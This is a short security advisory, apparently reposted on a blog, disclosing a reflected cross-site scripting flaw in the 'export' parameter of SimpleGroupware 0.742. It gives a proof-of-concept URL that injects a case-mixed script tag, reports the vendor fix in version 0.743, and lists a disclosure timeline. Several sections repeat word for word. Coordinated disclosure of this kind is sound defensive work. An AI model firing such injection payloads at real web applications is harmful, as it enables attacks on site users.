INFOSERVE-ADV2012-01 - SimpleGroupware 0.742 Cross-Site-Scripting vulnerability
Advisory:
|
SimpleGroupware 0.742 Cross-Site-Scripting vulnerability
|
Advisory ID:
|
INFOSERVE-ADV2012-01
|
Author:
|
Stefan Schurtz
|
Contact:
|
|
Affected Software:
|
Successfully tested on SimpleGroupware 0.742
|
Vendor URL:
|
|
Vendor Status:
|
fixed (see Changelog)
|
======================
Vulnerability Description
======================
SimpleGroupware 0.742 ‘export’ parameter XSS vulnerability
Vulnerability Description
======================
SimpleGroupware 0.742 ‘export’ parameter XSS vulnerability
==============
PoC-Exploit
==============
http://[target]/SimpleGroupware_0.742/bin/index.php?export=<ScRiPt >alert(‘xss’)</ScRiPt>
=====
Solution
=====
Upgrade to the latest Version 0.743
================
Disclosure Timeline
================
01-Feb-2012 – informed vendor
02-Feb-2012 – fixed by vendor
====
Credits
====
Vulnerabilitiy found and advisory written by the INFOSERVE security team.
=======
References
=======
http://www.infoserve.de/system/files/advisories/INFOSERVE-ADV2012-01.txt
PoC-Exploit
==============
http://[target]/SimpleGroupware_0.742/bin/index.php?export=<ScRiPt >alert(‘xss’)</ScRiPt>
=====
Solution
=====
Upgrade to the latest Version 0.743
================
Disclosure Timeline
================
01-Feb-2012 – informed vendor
02-Feb-2012 – fixed by vendor
====
Credits
====
Vulnerabilitiy found and advisory written by the INFOSERVE security team.
=======
References
=======
http://www.infoserve.de/system/files/advisories/INFOSERVE-ADV2012-01.txt
Comments
Display comments as Linear | Threaded